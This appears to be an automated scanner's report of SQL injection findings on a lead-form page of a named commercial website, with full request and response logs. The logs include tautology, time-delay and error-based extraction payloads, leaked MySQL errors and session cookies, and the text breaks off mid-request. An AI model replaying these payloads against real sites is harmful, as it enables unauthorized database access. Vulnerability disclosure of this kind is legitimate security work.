GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:33 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_556_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_556_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The button3 parameter appears to be vulnerable to SQL injection attacks. The payload 10197964'%20or%201%3d1--%20 was submitted in the button3 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit10197964'%20or%201%3d1--%20&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7382 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... _t=3&attributeId_556_t=3&button3=Submit10197964' or 1=1-- &companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 1
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=700te5tae9e6m5j6dvv9fg1p93; path=/ Content-Length: 4094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002'&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002''&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 2
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ilippmafikbfn49428thcqd8o7; path=/ Content-Length: 3917 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The companyname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the companyname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6ici7jm3r4g2ukrsfkfdetur45; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; 